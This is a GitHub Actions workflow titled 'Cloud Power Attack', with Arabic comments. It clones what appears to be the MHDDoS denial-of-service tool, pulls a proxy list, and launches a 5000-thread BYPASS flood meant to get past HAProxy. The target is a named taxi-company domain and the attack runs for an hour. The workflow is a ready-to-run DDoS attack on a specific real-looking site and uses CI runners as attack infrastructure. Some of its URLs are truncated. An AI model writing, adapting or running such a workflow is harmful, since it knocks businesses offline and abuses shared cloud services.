name: Cloud Power Attack
on: [workflow_dispatch]

jobs:
  attack_job:
    runs-on: ubuntu-latest
    steps:
      - name: Setup and Launch
        run: |
          # تحميل الأداة وتثبيت المكتبات بسرعة السحاب
          git clone --depth 1 https://github.com
          cd MHDDoS
          pip3 install -r requirements.txt
          curl -s https://githubusercontent.com > proxy.txt
          # تشغيل الهجمة بقوة 5000 Thread لتجاوز HAProxy
          python3 start.py BYPASS https://a2ztaxi.uk 5 5000 proxy.txt 100 3600
